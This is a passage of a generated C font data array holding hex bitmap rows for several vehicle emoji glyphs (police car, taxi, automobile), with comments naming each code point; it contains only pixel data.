0xf0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x60, 0x0,
0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x6,
0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x0, 0x0,
0x0, 0x60, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x0, 0x0, 0x6, 0x3f, 0xff, 0xff, 0xfe, 0x1,
0x80, 0x0, 0x0, 0x0, 0x63, 0x7, 0x83, 0xc1,
0xe0, 0x18, 0x0, 0x0, 0x0, 0x6, 0x30, 0xd8,
0x6c, 0x36, 0x1, 0x80, 0x0, 0x0, 0x0, 0x63,
0x1d, 0x8e, 0xc7, 0x60, 0x18, 0x0, 0x0, 0x0,
0x6, 0x33, 0x99, 0xcc, 0xe6, 0x1, 0x80, 0x0,
0x7, 0xfe, 0x63, 0x71, 0x98, 0xcc, 0x60, 0x18,
0x0, 0x0, 0xe2, 0x36, 0x36, 0x1b, 0xd, 0x86,
0x1, 0x80, 0x0, 0xc, 0x71, 0x63, 0xc1, 0xe0,
0xf8, 0x60, 0x18, 0x0, 0x0, 0xe3, 0x36, 0x3f,
0xff, 0xff, 0xfe, 0x1, 0x80, 0x0, 0xf, 0xff,
0x60, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0, 0x0,
0xff, 0xf6, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x18, 0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x81, 0x80, 0x1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x18, 0x0, 0x1c, 0x0, 0x0,
0x1, 0x80, 0x0, 0x1, 0x81, 0x80, 0x1, 0xc0,
0x0, 0x0, 0x18, 0x0, 0x0, 0x18, 0x18, 0x0,
0x1c, 0x0, 0x0, 0x1, 0x80, 0x0, 0x1, 0xff,
0xe0, 0x1, 0xc0, 0x0, 0x0, 0x18, 0x0, 0x0,
0x1f, 0xff, 0x0, 0x1c, 0x0, 0x0, 0x1, 0x80,
0x0, 0x0, 0x0, 0x70, 0x1, 0xfe, 0x1f, 0xfc,
0x18, 0x0, 0x0, 0x0, 0x7, 0x0, 0x1f, 0xe3,
0xff, 0xc1, 0x80, 0x0, 0x0, 0x0, 0x70, 0x1,
0xc7, 0x38, 0xc, 0x18, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1c, 0x73, 0x80, 0xc1, 0x80, 0x0, 0x0,
0x0, 0x70, 0x1, 0x87, 0x38, 0xc, 0x18, 0x0,
0x0, 0x0, 0x7, 0x0, 0x38, 0x73, 0x80, 0xc1,
0x80, 0x0, 0x0, 0x0, 0x70, 0x3, 0x87, 0x38,
0xc, 0x18, 0x0, 0x0, 0x0, 0x7, 0x0, 0x38,
0x73, 0x80, 0xc1, 0x80, 0x0, 0x0, 0x0, 0x70,
0x3, 0x87, 0x38, 0xc, 0x18, 0x0, 0x0, 0x0,
0x7, 0x0, 0x38, 0x73, 0x80, 0xc1, 0x80, 0x0,
0x0, 0x0, 0x70, 0x3, 0x9f, 0x3f, 0xfc, 0x18,
0x0, 0x0, 0x0, 0x7, 0x0, 0x3f, 0xc1, 0xff,
0xc1, 0x80, 0x0, 0x0, 0x0, 0x70, 0x7, 0xf0,
0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x7, 0x0,
0xfc, 0x0, 0x0, 0x1, 0x80, 0x0, 0x0, 0x0,
0x70, 0xf, 0x0, 0x0, 0x0, 0x18, 0x0, 0x0,
0x0, 0x7, 0x1, 0xe0, 0x0, 0x0, 0x1, 0x80,
0x0, 0x0, 0x0, 0x70, 0x3c, 0x0, 0x0, 0x0,
0x18, 0x1, 0xff, 0xff, 0xff, 0x3, 0xfc, 0x0,
0x0, 0x1, 0x80, 0x3f, 0xff, 0xff, 0xf0, 0x3f,
0xc0, 0x0, 0x0, 0x18, 0x7, 0xff, 0xff, 0xff,
0x3, 0x8c, 0x0, 0x0, 0x1, 0x80, 0x70, 0x0,
0x0, 0x70, 0x38, 0xc0, 0x0, 0x0, 0x18, 0xe,
0x0, 0x0, 0x7, 0x3, 0x8c, 0x0, 0x0, 0x1,
0x81, 0xc0, 0x0, 0x0, 0x70, 0x38, 0xc0, 0x0,
0x0, 0x18, 0x38, 0x0, 0x0, 0x7, 0x3, 0x8c,
0x0, 0x0, 0x1, 0x87, 0x0, 0x0, 0x0, 0x70,
0xff, 0xf8, 0x0, 0x0, 0x18, 0x70, 0x0, 0x0,
0x7, 0xff, 0xff, 0x81, 0xff, 0xff, 0xfe, 0x0,
0x1f, 0x0, 0x7f, 0xe0, 0x38, 0x7f, 0xff, 0xff,
0xc0, 0x7, 0xfc, 0x0, 0x7e, 0x3, 0x8f, 0xfe,
0x1, 0x80, 0x0, 0xff, 0xe0, 0x7, 0xe0, 0x39,
0xe0, 0xf0, 0x18, 0x0, 0x1e, 0xf, 0x0, 0x7e,
0x3, 0xbc, 0x7, 0x81, 0x80, 0x3, 0xc0, 0x70,
0x7, 0xe0, 0x3b, 0xc0, 0x38, 0x18, 0x0, 0x38,
0x7, 0x80, 0x7e, 0x3, 0xb8, 0x3, 0x81, 0x80,
0x3, 0x80, 0x38, 0x7, 0xff, 0xff, 0x80, 0x3f,
0xff, 0xff, 0xf8, 0x3, 0xff, 0xf7, 0xff, 0xf8,
0x3, 0xff, 0xff, 0xff, 0x80, 0x3f, 0xff, 0x0,
0x3, 0xc0, 0x38, 0x0, 0x0, 0x38, 0x7, 0x80,
0x0, 0x0, 0x3c, 0x3, 0x80, 0x0, 0x3, 0xc0,
0x78, 0x0, 0x0, 0x3, 0xe0, 0x78, 0x0, 0x0,
0x3c, 0xf, 0x0, 0x0, 0x0, 0x1f, 0xf, 0x0,
0x0, 0x1, 0xe1, 0xf0, 0x0, 0x0, 0x0, 0xff,
0xe0, 0x0, 0x0, 0xf, 0xfe, 0x0, 0x0, 0x0,
0x7, 0xfc, 0x0, 0x0, 0x0, 0x7f, 0xc0, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x3, 0xf0,
0x0, 0x0,
/* U+1F693 "🚓" */
0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe3, 0xff, 0xfe,
0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x30,
0x60, 0x66, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x6, 0x6, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x30, 0x60, 0x60, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x6, 0x6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x60, 0x60,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x63, 0xff,
0xfe, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x6, 0x3, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x0, 0x60, 0x30, 0xc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x6, 0x3, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc,
0x0, 0x7, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xff, 0xfe,
0x3, 0x80, 0x0, 0x0, 0x0, 0xe, 0x3, 0xff,
0xff, 0xf8, 0x1c, 0x0, 0x0, 0x0, 0x1, 0xe0,
0xfc, 0x6, 0x7, 0xc0, 0xe0, 0x0, 0x0, 0x0,
0x3c, 0x1e, 0x0, 0x60, 0xe, 0xe, 0x0, 0x0,
0x0, 0x7, 0x83, 0x80, 0x6, 0x0, 0x70, 0x70,
0x0, 0x0, 0x0, 0x70, 0x70, 0x0, 0x60, 0x3,
0x83, 0x80, 0x0, 0x0, 0xe, 0xe, 0x0, 0x6,
0x0, 0x1c, 0x3c, 0x0, 0x0, 0x1, 0xc1, 0xc0,
0x0, 0x60, 0x0, 0xe1, 0xe0, 0x0, 0x0, 0xfc,
0x38, 0x0, 0x6, 0x0, 0x7, 0xf, 0xc0, 0x1,
0xff, 0x87, 0x80, 0x0, 0x60, 0x0, 0x78, 0x7f,
0x80, 0xff, 0x80, 0xf0, 0x0, 0x6, 0x0, 0x7,
0x0, 0x7c, 0x3f, 0x80, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xe0, 0x1, 0xe7, 0x80, 0x1, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0xe, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0x7e, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xe0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x7e,
0xf, 0xff, 0xff, 0xff, 0xf3, 0x7f, 0xff, 0xff,
0x87, 0xe0, 0xff, 0xff, 0xff, 0xf0, 0x7, 0xff,
0xff, 0xf8, 0x7e, 0xf, 0xff, 0xff, 0xff, 0x0,
0x7f, 0xff, 0xff, 0xc7, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0xff, 0xff,
0xc0, 0xff, 0xfe, 0xf, 0xff, 0xff, 0xfc, 0x7,
0xff, 0xfe, 0x1f, 0xff, 0xc0, 0x7f, 0xff, 0xff,
0x80, 0x3f, 0xff, 0xff, 0xff, 0xf8, 0x3, 0xff,
0xff, 0xf8, 0x1, 0xff, 0xff, 0xff, 0xff, 0x0,
0x1f, 0xe7, 0xff, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xf0, 0x1, 0xfe, 0x1f, 0xf0, 0x1, 0xff, 0xff,
0xff, 0xff, 0x0, 0x1f, 0x80, 0x7, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x70, 0x1, 0xc0, 0x0, 0x78,
0x1, 0xc0, 0x0, 0x0, 0x7, 0x0, 0x1c, 0x0,
0x3, 0x80, 0x38, 0x0, 0x0, 0x0, 0x38, 0x3,
0x80, 0x0, 0x3c, 0x7, 0x80, 0x0, 0x0, 0x3,
0xc0, 0x78, 0x0, 0x1, 0xe0, 0xf0, 0x0, 0x0,
0x0, 0x1e, 0xf, 0x0, 0x0, 0x1f, 0xff, 0x0,
0x0, 0x0, 0x1, 0xff, 0xf0, 0x0, 0x0, 0x7f,
0xc0, 0x0, 0x0, 0x0, 0x7, 0xfc, 0x0, 0x0,
0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x0,
0x0,
/* U+1F694 "🚔" */
0x0, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x38, 0xff, 0xff, 0xff, 0xfc,
0x70, 0x0, 0x0, 0x0, 0x63, 0xff, 0xff, 0xff,
0xf1, 0x80, 0x0, 0x0, 0x0, 0xc, 0x0, 0x30,
0x0, 0xc0, 0x0, 0x0, 0x3, 0xf0, 0x30, 0x0,
0xc0, 0x3, 0x3, 0xe0, 0x0, 0xf, 0xc0, 0xc0,
0x3, 0x0, 0xc, 0xf, 0x80, 0x0, 0x0, 0x3,
0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x6, 0x0, 0x70, 0x3, 0x80, 0x18, 0x0, 0x0,
0x0, 0x78, 0x1, 0x80, 0x6, 0x0, 0x78, 0x0,
0x0, 0x3, 0x80, 0x6, 0x0, 0x18, 0x0, 0x70,
0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0x80,
0x40, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0,
0xf, 0x80, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x0,
0x0, 0x38, 0x1f, 0x80, 0x0, 0x7e, 0x7, 0x0,
0x0, 0x1, 0xc0, 0xff, 0x0, 0x3, 0xfc, 0xc,
0x0, 0x0, 0xf, 0x3, 0xfc, 0x0, 0xf, 0xf0,
0x38, 0x0, 0x0, 0x38, 0xf, 0xf0, 0x0, 0x3f,
0xc0, 0x60, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x7, 0xe7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x9f, 0xbf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf3, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0x0,
0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80,
0x3, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfe,
0x0, 0xf, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xf8, 0x0, 0x3f, 0xff, 0xf0, 0x0, 0x0, 0x1f,
0xff, 0xe0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x0, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xff, 0xff,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xc0, 0x7, 0x80,
0x38, 0x0, 0x0, 0x0, 0xf0, 0xf, 0x0, 0x1e,
0x0, 0xe0, 0x0, 0x0, 0x3, 0x80, 0x3c, 0x0,
0x78, 0x1, 0xc0, 0x0, 0x0, 0xe, 0x0, 0xf0,
0x1, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x70, 0x3,
0xc0, 0x7, 0x80, 0x1c, 0x0, 0x0, 0x1, 0xc0,
0xf, 0x0, 0x1e, 0x0, 0xf8, 0x0, 0x0, 0x7,
0x80, 0x3c, 0x0, 0x7f, 0xff, 0xf0, 0x0, 0x0,
0x3f, 0xff, 0xf0, 0x1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x71, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x30, 0x1, 0xc0,
0x3f, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xc0, 0x7,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x60, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x1, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x0, 0x7f, 0x9f, 0xff,
0xff, 0xff, 0xfc, 0x7f, 0x80, 0x1, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x1, 0xfe, 0x0, 0x7, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x7, 0xf8, 0x0, 0x1f,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x80,
0x1, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x0, 0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x7,
0xf0, 0x0,
/* U+1F695 "🚕" */
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xc0, 0x0, 0xf, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xe0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf8, 0x0, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x0, 0xff, 0xfc, 0x3,
0xe0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0xff, 0xff,
0xf8, 0xf, 0x0, 0x0, 0x0, 0x0, 0x38, 0x3f,
0x3, 0x83, 0xe0, 0x78, 0x0, 0x0, 0x0, 0x7,
0x7, 0x80, 0x38, 0x7, 0x83, 0x80, 0x0, 0x0,
0x0, 0xf0, 0xf0, 0x3, 0x80, 0x1c, 0x1c, 0x0,
0x0, 0x0, 0x1e, 0x1e, 0x0, 0x38, 0x0, 0xe1,
0xe0, 0x0, 0x0, 0x1, 0xc3, 0xc0, 0x3, 0x80,
0x7, 0xf, 0x0, 0x0, 0x0, 0x38, 0x78, 0x0,
0x38, 0x0, 0x30, 0x78, 0x0, 0x0, 0x7, 0x87,
0x0, 0x3, 0x80, 0x3, 0x83, 0xe0, 0x0, 0x3,
0xf0, 0xe0, 0x0, 0x38, 0x0, 0x1c, 0x1f, 0x0,
0xf, 0xfe, 0xe, 0x0, 0x3, 0x80, 0x1, 0x80,
0x7c, 0xf, 0xff, 0xe0, 0xe0, 0x0, 0x38, 0x0,
0x38, 0x3, 0xe3, 0xff, 0x80, 0xf, 0xff, 0xff,
0xff, 0xff, 0x0, 0xf, 0x7f, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xe0, 0x0, 0x77, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xfe, 0xe, 0x0, 0x0, 0x3c,
0x3c, 0x3c, 0x0, 0x0, 0x3f, 0xe0, 0xe0, 0x0,
0x3, 0xc3, 0xc3, 0xc0, 0x0, 0x3, 0xfe, 0xc,
0x0, 0x0, 0x3c, 0x3c, 0x3c, 0x0, 0x0, 0x3f,
0xe0, 0xc0, 0x0, 0x3, 0xc3, 0xc3, 0xc0, 0x0,
0x3, 0xfe, 0x1c, 0x0, 0x1, 0xc3, 0xc3, 0xc3,
0x80, 0x0, 0x3f, 0xff, 0x80, 0x0, 0x1c, 0x3c,
0x3c, 0x38, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x1,
0xc3, 0xc3, 0xc3, 0x80, 0x0, 0x7, 0xe0, 0x0,
0xfc, 0x1c, 0x3c, 0x3c, 0x38, 0x1f, 0x80, 0x7e,
0x0, 0x3f, 0xf0, 0x0, 0x0, 0x0, 0x7, 0xfe,
0x7, 0xe0, 0x7, 0xff, 0x80, 0x0, 0x0, 0x0,
0xff, 0xf0, 0x7e, 0x0, 0xf8, 0x7c, 0x0, 0x0,
0x0, 0x1e, 0xf, 0x87, 0xe0, 0xe, 0x1, 0xc0,
0x0, 0x0, 0x1, 0xc0, 0x78, 0x7e, 0x1, 0xc0,
0x1e, 0x0, 0x0, 0x0, 0x38, 0x3, 0xc7, 0xe0,
0x1c, 0x0, 0xe0, 0x0, 0x0, 0x3, 0x80, 0x3c,
0x7e, 0x1, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x38,
0x1, 0xc7, 0xe0, 0x1c, 0x0, 0xe0, 0x0, 0x0,
0x3, 0x80, 0x1c, 0x77, 0xff, 0xc0, 0xf, 0xff,
0xff, 0xff, 0xf8, 0x3, 0xfe, 0x3f, 0xfc, 0x1,
0xff, 0xff, 0xff, 0xff, 0x80, 0x3f, 0xc0, 0x0,
0xe0, 0x1c, 0x0, 0x0, 0x0, 0x1c, 0x7, 0x80,
0x0, 0xf, 0x87, 0xc0, 0x0, 0x0, 0x1, 0xe0,
0xf8, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
0xf, 0xff, 0x0, 0x0, 0x3, 0xff, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xe0, 0x0, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
/* U+1F696 "🚖" */
0x0, 0x0, 0x0, 0x1f, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x3, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x86, 0x61, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x86, 0x61, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb9, 0x9d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb9, 0x9d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x1, 0x80, 0x0, 0x0, 0x1, 0xe0, 0x0,
0x0, 0x3, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x3, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x6, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x6, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0xc, 0x3f, 0x0, 0x0, 0xfc, 0x38, 0x0,
0x0, 0xc, 0x3f, 0x0, 0x0, 0xfc, 0x38, 0x0,
0x0, 0x18, 0x7f, 0x0, 0x0, 0xfe, 0x1c, 0x0,
0x0, 0x18, 0x7f, 0x0, 0x0, 0xfe, 0x1c, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x7c, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x3e,
0xfe, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f,
0xfe, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0x7f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfe,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0,
0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x6, 0x0, 0x0, 0x7f, 0xff, 0x0, 0x0, 0x70,
0x7, 0xff, 0xf, 0xff, 0xff, 0xf8, 0xff, 0xf8,
0x7, 0xff, 0xf, 0xff, 0xff, 0xf8, 0xff, 0xf8,
0xe, 0x3, 0x8f, 0xff, 0xff, 0xf9, 0xc0, 0x38,
0xe, 0x1, 0x8f, 0xff, 0xff, 0xf9, 0x80, 0x38,
0xe, 0x1, 0xc7, 0xff, 0xff, 0xf3, 0x80, 0x38,
0xf, 0xff, 0xc7, 0xff, 0xff, 0xf3, 0xff, 0xf8,
0xf, 0xff, 0xc3, 0xff, 0xff, 0xe3, 0xff, 0xf8,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0xf, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xf8,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x6, 0xf, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x78,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x3, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xc0,
/* U+1F697 "🚗" */
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x3, 0x80, 0xff, 0xff, 0xc0, 0x70, 0x0, 0x0,
0x0, 0x7, 0x83, 0xff, 0xff, 0xf0, 0x38, 0x0,
0x0, 0x0, 0xf, 0x7, 0x80, 0xe0, 0x7c, 0x1c,
0x0, 0x0, 0x0, 0x1e, 0x1e, 0x0, 0xe0, 0x1e,
0x1e, 0x0, 0x0, 0x0, 0x3c, 0x38, 0x0, 0xe0,
0x7, 0xf, 0x0, 0x0, 0x0, 0x78, 0x70, 0x0,
0xe0, 0x3, 0x87, 0x80, 0x0, 0x0, 0xf0, 0xe0,
